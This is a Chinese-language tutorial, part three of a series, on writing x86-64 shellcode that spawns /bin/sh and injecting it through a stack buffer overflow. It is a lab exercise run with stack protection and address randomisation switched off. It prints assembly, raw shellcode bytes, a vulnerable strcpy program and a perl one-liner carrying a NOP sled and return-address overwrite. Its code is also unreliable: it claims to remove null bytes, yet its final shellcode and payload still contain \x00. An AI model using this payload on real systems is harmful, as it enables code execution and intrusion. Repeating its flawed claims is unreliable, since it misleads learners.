黑客攻防入门(三)shellcode进阶

1. 概说

实际上,编写shellcode面昨很多障碍和限制,很多时候必须忍受没有办法解决问题的痛苦。

2. 问题

首先,在缓冲区里使用植入shellcode,代码里只能出现一个NULL(0)字符,因为所有的输入函数,只要检测到NULL字符就会返回,因此,NULL只能够出现在shellcode的结尾处,否则,shellcode将会变得不完整。

其次,缓冲区的大小,大部分的缓冲区都是一个很小的空间,如8字节,16字节,在这么小的空间里shellcode的编写真变得很紧凑了。

  1. 通常,一个通过网络去获取shell的code,包含的代码很容易就越出了缓冲区的容纳空间,这样的结果,往往是把无用的数据填充在了返回地址的空间上,达不到取得程序运行控制的目的。
  2. 解决这个问题的方法是有很多,聪明的黑客想出了头尾两段shellcode写法,先将shellcode的头部植入缓冲区,然后再跳转到其它位置的shellcode的尾部。
  3. 不过,这只是一个思路,要再找一个植入尾部的空间,是一件很有挑战性的工作。

最后,Sehllcode最重要的工作是要确定自己在内存的位置,这是一个非常困难的任务,栈上和堆上的缓冲区地址几乎是不可能豫知的,再高明的黑客也只能通过将程序崩溃来推算具体地址,虽然有聪明的黑客想出避免崩溃的办法,但这总是相对于运气来说的。

这里只阵述三个基本的问题,编码操作中会有千万万的问题出现,如多平台间的区别,系统调用的差异,恢复入侵程序的运行等等。

3. 修改shellcode

我们在前一篇文章里构造了一个shellcode,现在我们根据问题来再次修改这个shellcode,令它可以适应缓冲区输入的条件。

.section .text
.global _start
_start:
jmp     cl
pp: popq %rcx
pushq   %rbp
mov     %rsp, %rbp
subq    $0x20, %rsp
movq    %rcx, -0x10(%rbp)
movq    $0x0,-0x8(%rbp)
mov     $0, %edx
lea     -0x10(%rbp), %rsi
mov     -0x10(%rbp), %rdi
mov     $59, %rax
syscall
cl:call pp
.ascii "/bin/sh"

上面这段代码里,有两个地方出现了0x0, 如果用作缓冲区输入,则会造成输入提前返回,shellcode植入失败。

还有一个注意的是0x20,这个在ascii里代表的是空,也会造成输入中断,输入函数返回。

我们可以将有ox0的代码用其他指令代替

首先,我们用指令: xorq %rax, %rax
这条指令可以把rax寄存器通过异或运算置0
然后0x0的地方就可以用%rax代替了。
把0x20改为0x16,这个没关紧要,是栈空间的大小,shellcode中是用来保存'/bin/sh'这个字符串用。

下面是修改后的代码:

.section .text
.global _start
_start:
jmp     cl
pp: popq %rcx
pushq   %rbp
mov     %rsp, %rbp
subq    $0x16, %rsp
movq    %rcx, -0x10(%rbp)
xorq     %rax,  %rax
movq    %rax,-0x8(%rbp)
movq     %rax, %rdx
lea     -0x10(%rbp), %rsi
mov     -0x10(%rbp), %rdi
mov     $59, %rax
syscall
cl:call pp
.string "/bin/sh"

将代码编译后用objdump取出十六制编码如下:

\xeb\x28\x59\x55\x48\x89\xe5\x48
\x83\xec\x16\x48\x89\x4d\xf0\x48
\x31\xc0\x48\x89\x45\xf8\x48\x89
\xc2\x48\x8d\x75\xf0\x48\x8b\x7d
\xf0\x48\xc7\xc0\x3b\x00\x00\x00
\x0f\x05\xe8\xd3\xff\xff\xff\x2f
\x62\x69\x6e\x2f\x73\x68

4. 测试实验

简单的修改了shodecode后,我们用下面的c代码生成的程序进行缓冲区溢出测试。

#include 
#include 

#define BUFSIZE 64

int main(int argc, char *argv[])
{
    char buf[BUFSIZE];
    strcpy(buf, argv[1]);
    printf("Buf: %p\n", &buf);
    return 0;
}

这段代码为我们解决了前面所提到的两大问题,就是

  1. 缓冲区足够放入我们的shellcode
  2. 我们用printf将shellcode植入的地址打印出来,实际的入侵中,不会出现这些便利。
  3. buf处于main的栈基上第一个变量,我们很容易计算出buf离main设定的返回地址的距离:计算方法很简单, BUFSIZE+8的地址里就是main保存返回地址的地方。

为什么这样计算,请参考我写的入门(一)。

现在我们要做的事情是,令buf的地址覆盖main的返回地址(下面称它为ret),我们已经知道buf到ret的长度是BUFSIZE(64)+8,即是72byte。

下面我们来计算一下shellcode的大小:

\xeb\x28\x59\x55\x48\x89\xe5\x48
\x83\xec\x16\x48\x89\x4d\xf0\x48
\x31\xc0\x48\x89\x45\xf8\x48\x89
\xc2\x48\x8d\x75\xf0\x48\x8b\x7d
\xf0\x48\xc7\xc0\x3b\x00\x00\x00
\x0f\x05\xe8\xd3\xff\xff\xff\x2f
\x62\x69\x6e\x2f\x73\x68

我们的shellcode共53byte,那么我们还需要添加19byte(72-53=19)其他内存才能将缓冲区溢出ret地址处。

那么我添加一些什么内容呢? 这内容可不是随随便便都可以的。

程序设计里有一个操作叫NOP,它是no operation的简写,就是什么也不做,简直天生是为缓冲区溢出而设计的。

当然nop是为了让程序产生短暂的停顿而设计的。

添加内容是加在shellcode的头还是尾呢?

这也是有考究的,将NOP加在shellcode的头,能够增加注入的机率,原因是什么呢?

buf的地址因每次程序的启动而改变,所以很难精准地获取到,但它终是在一个范围内变动,我们只要将ret落在buf地址的变动范围内,最理想就是落在shellcode的起始地址里,比较理想的是落到NOP中,通过NOP的移动,执行shellcode。
不过由于是测试程序,我们已经知道了注入的确切地址,一切都好办起来。

NOP写成指令就是0x90, 下面我们用0x90填充shellcode头部,让它达到72byte的长度。

\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90
\xeb\x28\x59\x55\x48\x89\xe5\x48
\x83\xec\x16\x48\x89\x4d\xf0\x48
\x31\xc0\x48\x89\x45\xf8\x48\x89
\xc2\x48\x8d\x75\xf0\x48\x8b\x7d
\xf0\x48\xc7\xc0\x3b\x00\x00\x00
\x0f\x05\xe8\xd3\xff\xff\xff\x2f
\x62\x69\x6e\x2f\x73\x68

好了,下面我们编译写好的C测试程序:

gcc -g -fno-stack-protector -z execstack -o stack1 stack1.c

# gcc带的参数-g是产生gdb调试符号,另外的参数则是取消堆栈代码运行保护。

我们先执行stack1, 目的是查看buf的地址。

[root@localhost stack]# ./stack1  1
Buf: 0x7fffffffe300

新的内核在每次装载程序时,基栈地址都会发生变化,在这里我们先将这个功能限制了
参数设置:sysctl -w kernel.randomize_va_space=0
通过这样设置就可以固定程序基栈起址

然后我们开始注入shellcode测试:

./stack1 `perl -e 'print "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xeb\
 x28\x59\x55\x48\x89\xe5\x48\x83\xec\x16\x48\x89\x4d\xf0\x48\x31\xc0\x48\x89\x45
\xf8\x48\x89\xc2\x48\x8d\x75\xf0\x48\x8b\x7d\xf0\x48\xc7\xc0\x3b\x00\x00\x00\x0f
\x05\xe8\xd3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x00\xe3\xff\xff\xff\x7f"'`

#最后的这个\x00\xe3\xff\xff\xff\x7f就是【ret】返回地址,通过这个地址去执行我们的shellcode。
#前一个\00用来终止shellcode,没有这个\00可能会有出现问题。

6. 总结

以上实验都是人为堆拼制造的溢出环境,主要目的是掌握溢出的基本原理、方法。

现在,要绕开各种限制,真实的溢出入侵,还存在很大的距离。

往下文章继续介绍和研究,请关注和指点!

你可能感兴趣的:(黑客攻防入门(三)shellcode进阶)